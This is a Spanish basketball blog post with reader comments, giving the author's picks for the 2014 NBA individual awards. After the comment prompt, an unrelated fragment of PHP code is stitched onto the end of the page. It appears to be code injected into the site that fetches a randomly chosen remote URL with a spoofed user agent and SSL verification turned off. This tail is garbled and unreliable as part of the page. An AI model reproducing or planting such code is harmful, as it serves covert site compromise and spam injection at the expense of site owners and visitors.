Pronósticos a los premios 2014

16 de April de 2014 por TheDeerHunter

Como es tradición vamos a adelantar nuestras propuestas para los premios individuales del curso. Más que nada para que no se pierda Adam Silver, que es rookie como comisionado. Como siempre estamos abiertos a réplicas.

Most Valuable Player

La corona de mejor jugador del mundo debe cambiar de manos este curso. No lo decimos porque estemos cansados de que LeBron James la haya ganado 4 veces en los últimos 5 años (que lo estamos) o que no haya acumulado méritos suficientes para lograrlo (27.1 ppp  -57% FG; 6.9 reb; 6.4 asis; 1.6 rob…). Ni siquiera se trata del asunto de la lesión de Westbrook, que concentró tanto los focos en Kevin Durant (Wade ha jugado sólo 7 partidos más que Westbrook).

Simplemente “Durantula” ha sido mejor y como hicimos el año pasado con “su némesis” trataremos de repasar su “monstruosidad” de campaña: 32 puntos por partido, su cuarto título de máximo anotador sacándole casi 5 puntos al segundo; mirándole a la cara al mejor jugador de la historia en sus mejores campañas… el primero desde su majestad (91-92) en promediar más de 30 puntos por encima del 50% en tiro (50,5% y 39,5% en triples), récord de partidos consecutivos de más de 25 puntos que estaba en manos del 23; 3 meses consecutivos promediando 33 puntos (como Jordan en la 89-90); uno de los únicos 4 genios en la historia que han promediado 32 puntos, 7 rebotes y 5 asistencias (junto al propio Jordan, Elgin Baylor y Wilt Chamberlain). No hace falta añadir mucho más, pero además algunas de las canastas ganadoras más alucinantes y varias de las actuaciones más sensacionales que se han visto este curso. Nos repetimos… Algún día diremos aquello de “Yo vi jugar a Lebron y Durant”.

Por aquello de completar el podio, a distancia sideral, podríamos situar a Blake Griffin. Hemos hablado mucho de él y no creo que quede nadie que niegue su excelencia este curso. La mejor temporada de la historia de los Clippers debe tener un reconocimiento al mayor culpable de la misma. Quizá si el carácter de los Spurs fuera distinto o no hubiéramos asistido a las pájaras de Pacers y Blazers podríamos estar hablando de otra cosa.

Rookie Of the Year

Este no será un año que se recordará eternamente por la rutilante brillantez de su generación de novatos.

En condiciones normales no sería fácil digerir un premio para algún miembro de la calamidad de “bandas” que hemos tenido que tirarnos a la cara este año pero la competencia es la que es y la naturaleza del galardón rara vez ha contemplado mayores exigencias en lo colectivo.

Tan sólo Mason Plumlee ha terminado siendo importante en un “contender” y su campaña está lejos de asombrar en lo individual. Nuestros favoritos pertenecen a otra liga. Michael Carter-Williams por los Sixers, Victor Oladipo por los Magic y, el tapado, Trey Burke, todos en alegre modo tanking con todo lo que ello supone respecto a la autenticidad de su talento real y sus números.

Previsiblemente el premio está dado desde ya hace algún tiempo. Carter-Williams arrasará probablemente en las votaciones porque ha supuesto una importante sorpresa, porque lidera las tablas de rookies en prácticamente todas las categorías estadísticas y porque también ha firmado de largo el mayor número de grandes actuaciones de la hornada. Con los números en la mano habría que retrotraerse nada menos que a Magic Johnson y Oscar Robertson para alcanzar una comparación posible en una campaña tan completa, pero como hemos dicho habría que ponerlo un poco en cuarentena. Habrá que seguir su evolución.

A Oladipo probablemente le ha perjudicado generar mayores espectativas, que ha cumplido en parte, y también el desempeño de su equipo que no daba para gustarse demasiado. Su campaña es notable, quizá la más constante de todos, pero relativamente pobre para discutir realmente el premio.

Trey Burke, sin las más remotas opciones, podría ser considerado el ganador espiritual en términos prácticos porque su aportación ha sido la más palpable en el balance de su equipo. No lleva genes de estrella pero sí de gran director de juego que hace mejores a los que le rodean.

Defensive Player of the Year

En mi opinión existía un candidato oculto en la carrera por el MVP “humano” (el tercer puesto, me refiero) que estaba condenado a quedar en el tintero. Es difícil imaginar mayor y más generosa aportación de un jugador a los intereses de su equipo. Siguiendo casi clónicamente el modelo que aplicó Marc Gasol el año pasado, Joakim Noah es el alma máter de unos Chicago Bulls que han logrado volver a ser competitivos a pesar de la imponderable ausencia de Derrick Rose.

La mejor defensa de la liga se cimenta sobre la alargada figura del francés. Cada una de sus actuaciones es una clase magistral de posición defensiva, intensidad, inteligencia, compromiso… Un defensor física y mentalmente perfecto, que además logra aplicar su personal filosofía y versatilidad en ataque, aún siendo más limitado. El “chico para todo” en su equipo cuyo oscuro esfuerzo rara vez se ve reconocido en los box-scores pero que tantas victorias aporta.

En segunda posición volvería a meter a LeBron James, asombrosamente ignorado en este apartado este año por la mayoría de medios. Opino que el baloncesto le debe este premio y algún día se lo dará, porque sigue siendo el único hombre que, exceptuando quizá a determinados centers, es capaz de secar a cualquier rival sea cual sea su posición. Al “rey” diría que le ha perjudicado el desempeño general de su equipo así como sus sistemas defensivos, cada año más vulnerables.

Cerrando el podio podríamos nombrar varios interiores como Hibbert, Bogut, Ibaka, Anthony Davis, DeAndre, Howard… pero yo me quedo con Tim Duncan. Verle amargar la vida a sus pares, en el ocaso de su carrera, sin la plenitud física que disfrutan prácticamente todos es de manual. Todo él es de manual. Tim Duncan es la Biblia del baloncesto personificada.

Sixth Man Award

No me resulta fácil fijar el concepto de “mejor sexto hombre”. ¿De qué se trata exáctamente? ¿Es el mejor hombre de banquillo de la liga? ¿Toma ventaja un teórico suplente que termina siendo titular por circunstancias?

Se diría que en los últimos años ha sido al revés, un teórico titular que lideraba casi de forma monopolista la segunda unidad. Se trataba de sacrificar la titularidad a cambio de un mayor protagonismo saliendo desde el banco para no perder pegada en el descanso del resto de puntales del equipo.

Extraña ligeramente considerar candidato a mejor 6º alguno de los grandes nombres que se barajan. ¿Quién es el 6º hombre de los Spurs? ¿Manudo? ¿Porqué no Bellinelli o Patty Mills? ¿Y en Chicago… Gibson o Augustin? ¿Ha sido Reggie Jackson un gran 6º o sencillamente sustituyó de forma inmejorable a Westbrook cuando se lesionó?

Parece que el jugador cuyo rol más y mejor se aproxima actualmente a lo que se entiende por 6º hombre es Jamal Crawford en los Clippers. No en vano ya lo ganó con los Hawks en la 2009-10, precisamente el año que pasó a ser definitivamente (falso) suplente, y este curso ha sido incluso superior a aquel. Apostaríamos por él como ganador.

El segundo en liza, con también importantes posibilidades de ganarlo, es Taj Gibson. Ha cuajado el mejor año de su carrera dando un salto cualitativo importante. ¿Porqué hablamos de él y no de Augustin? Sencillamente es el hombre más utilizado en el último cuarto en términos absolutos en la liga. Es que en su equipo juega más que Boozer, siendo suplente. Una mala bestia defensiva que también ha mejorado significativamente en ataque. Muy del gusto de Thibodeau.

Por último, dejando de lado a nombres importantes como Ginobili o Jackson que en mi opinión se alejan demasiado del concepto más puro me quedaría con Markieff Morris, que ha sido vital en la extraordinaria temporada de los Suns.

Most Improved Player

Mucho me temo que este premio causará controversia. Es de lejos el más reñido este curso. Los dos favoritos llegan en un empate técnico y cualquiera de ellos está en condiciones de lograrlo. Nosotros, por supuesto, debemos mojarnos y elegir a uno. Además de ellos este año ha habido muchos y buenos jugadores mejorados.

Como algunos ya habréis adivinado estamos hablando de Anthony Davis y Goran Dragic. En este blog se ha hablado mucho y bien de Davis, pero me temo que esta ocasión nos decantamos por el esloveno. La mejora de Dragic es puramente cualitativa. Disfrutando esencialmente de los mismos minutos que el año pasado ha anotado casi 6 puntos más, pero pasando de un 44% a por encima del 50% en tiro y también sobre el 40% a la larga distancia (sólo Wade iguala esos números entre los guards). Ante la larga baja de Bledsoe se multiplicó manteniendo “el sueño de la cenicienta” lo que humanamente ha sido posible. Responsable máximo de un 58% de victorias, nada menos. Una capacidad de liderato que sólo le habíamos conocido en el baloncesto FIBA. La injusticia del año fue que no le llamaran para el all-star.

La mejora de Anthony Davis también ha sido incontestable. All-star con todas las de la ley y avisando que se ha despertado una bestia. Supongo que lo que deshace el empate en su contra es que quien más y quien menos lo veía venir, además que en parte se ha producido por un notable incremento de minutos. La trayectoria de los Pelicans tampoco le beneficia.

Para el tercer puesto hay una lista de candidatos inacabable: DeAndre, DeRozan, Cousins, Isaiah, Stephenson, Patty Mills, Terrence Jones, Markieff Morris, Drummond, Afflalo, Wall, Livingston, Meeks… pero el que más nos ha dejado a cuadros a la mayoría ha sido Gerald Green quién hasta ahora a duras penas lograba sobrevivir como temporero/saltarín en la liga y se ha transformado en un hombre importante, en un equipo serio. La mayor sorpresa del año.

Coach Of the Year

El mejor entrenador del mundo ahora mismo es Greg Popovich, no hay vuelta de hoja. Quizá también lo sea del lustro, o de la década. Es imposible conjuntar mejor todo lo se le pide a un entrenador: gestión de recursos propios, resultados, juego… Los Spurs han dominado la liga nuevamente contra pronóstico y con cierta comodidad, desplegando el baloncesto más preciosista de la liga y alcanzando el summun del juego colectivo. 13 hombres (sin contar De Colo y Daye que salieron) en dobles figuras de PER. Asombroso. No cabe duda que la culpa es suya. Eso es jugar bien las cartas que te dan.

De no existir ese monstruo de los banquillos, Jeff Hornacek nos tiene ganados este año a todos. Nadie imaginaba la que iba a liar en Phoenix… ni siquiera ellos. Él es el responsable de que todos hayamos sido un poco de los Suns este curso; de que un puñado de sus jugadores podrían haber sido candidatos perfectos al MIP; de que hasta el último momento han estado a punto de dejar en la cuneta a un señor equipo como los Grizzlies. Nunca fue un pulso en igualdad.

Como tercer hombre tenemos a Tom Thibodeau. Los Bulls mantienen inequívocamente su seña de identidad. Independientemente de las zancadillas del destino son competitivos, desde la solidez que les aporta una defensa sin fisuras. El bueno de Tom, además, como sólo los grandes técnicos saben hacer encuentra petróleo de la nada y cada año saca alguna de las sorpresas del curso.

Otros destacados han sido Doc Rivers, Dwane Cassey, Stotts, Vogel, Carlisle, Clifford…

Comenta

7 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    LeBron ha sido un peso muerto en la Defensa de Miami este año… defienden peor con él. y aporta menos que el jugador promedio de la liga en defensa… el año pasado no sé, pero esta, hablar de su defensa es hablar de algo casi inexistente.

      Citar

  2. TheDeerHunter dice:
    #2

    Jose Luis:
    LeBron ha sido un peso muerto en la Defensa de Miami este año… defienden peor con él. y aporta menos que el jugador promedio de la liga en defensa… el año pasado no sé, pero esta, hablar de su defensa es hablar de algo casi inexistente.

    No te sé decir. Yo no tengo esa percepción. Y bueno, en ESPN también lo nombran en las votaciones a mejor defensor del año. No soy el único.
    Igual me he dejado llevar por lo que he visto de él más allá de números, y está muy lejos de ser “defensa inexistente” o “peso muerto”. No tengo excesiva confianza en las aproximaciones numéricas referidas a este aspecto. Por ejemplo… no me puedo creer eso de que el equipo defiende peor con él. ¿Te refieres a los 10 minutos escasos de promedio donde él no está en pista? ¿Quién hay enfrente en esos minutos? La segunda unidad, con total seguridad…
    Yo lo que he visto es que se le sigue respetando cosa mala… es que su par apenas lo intenta. Creo que sí que hay por ahí una cifra de tiros a canasta intentados contra él y es ridícula. Sigue siendo un animal. Nunca le he visto bajar su agresividad en pista. Se sigue inflando a robar, a intimidar… Si acaso puedo admitirte que no hace el nivel de ayudas que Noah o Marc… su defensa es más individual que posicional. Poco más.
    Como digo, no estoy de acuerdo, por lo que yo he visto. Aunque puede que tengas razón, no te digo que no.

      Citar

  3. Jose Luis dice:
    #3

    Yo leí esto, y otros análisis que luego buscaré 🙂

    http://espndeportes.espn.go.com/news/story?id=2061160&s=bas&type=story

      Citar

  4. txusma dice:
    #4

    Buena hornada de entrenadores tenemos este año porque yo pongo a Doc Rivers a la altura de los 3 que ha nombrado Deer. Un tio que convierte lo q parecía un trozo de carne como DeAndre Jordan en uno de los center más determinantes de la liga, ha de ser un top sí o sí.

      Citar

  5. Dantley dice:
    #5

    El argumento DeAndre Jordan es demoledor, jaja.

    Para mí, valoraría a Hornacek. Popovich es el mejor del mundo como dice Deer, pero en relación resultados/materia prima, creo que Hornacek sale reforzado.

    El MIP Dragic por similares razones, tampoco Davis ha mejorado tanto a su equipo y ha dado menos victorias.

    El 6º hombre, lo ha clavado Deer, es muy surrealista.

    Rookie lo dejaría desierto. No se van a atrever pero ha sido un poco patético.

    MVP Durant parece obvio y DPOY no sé, Noah ha sido importantísimo y eso hay que valorarlo, pero lo de Duncan es muy serio. Con cualquiera de los dos sería justo.

      Citar

  6. Sancho88 dice:
    #6

    Yo soy muy de Thibbs pero Popo se vuelve a merecer una vez más el COY. Para el MIP Davis mejor que Dragic para mí, pero barriendo para casa… ISAIAH THOMAS. Este sí que ha sido una sorpresa, una mejora mayúscula. De repente ha aprendido a dirigir al equipo, es la muchísimo menos chupón que el año pasado y a pesar de eso anota más… me tengo que rendir ante el chaval. Yo lo crucifiqué, me parecía de los peores bases titulares de la liga. Ahora no sabría que decir, pero no lo bajo del Top 10 de mejores bases. Es buenísimo.

    Y para sexto hombre a mi me ha encantado este año DJ Augustin, pero se lo darán prácticamente seguro a Jamaal.

    El premio defensivo tiene que ser sí o sí a Noah, y lo va a ser.

    MVP indiscutible Durant.

    ROY MCW, pero lo veo en modo Tyreke Evans en el futuro. No le veo nada especial al chaval. Su altura, sus brazos… pero muchas pérdidas, lejos de ser un gran defensor… su evolución pasa por convertirse en pasador. Del resto de rookies veo a Mason Plumlee, Hardaway Jr. , McLemore y Dieng con un gran peso específico en sus roles. Oladipo me desconcierta, debería ser titular, podría ser un poco Eric Bledsoe en el futuro no?

      Citar

  7. Denise dice:
    #7

    Sancho88:
    Oladipo me desconcierta, debería ser titular, podría ser un poco Eric Bledsoe en el futuro no?

    Oladipo puede ser un gran jugador de equipo pero no lo veo como un jugador franquicia, y Orlando creo que se equivocaría si apuesta por Oladipo como tal. Hace un año, su best-case comparación era Tony Allen, y a dia de hoy, Vic O me parece un tipo con mucha mas proyección y que va a hacer más carrera que el de Memphis. Por esa parte, podemos decir que Oladipo ha cumplido con creces en su primer año, más aun con la de rookies que han naufragado en este último Draft. Pero para ser un jugador franquicia ó convertirse en D-Wade como he llegado a leer en algunos foros, le falta muchisimo. La mayoría de sus canastas son penetraciones gracias al fisico brutal que tiene, y debería desarrollar muchos más movimientos en estatico y mejorar su pobre tiro exterior. Por comparativa en lo que puede hacer en su carrera y el rol que le pueden dar, lo compararía con Andre Iguodala, pero naturalmente en el SG. Convertir a Oladipo en un PG a tiempo completo me disgusta.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>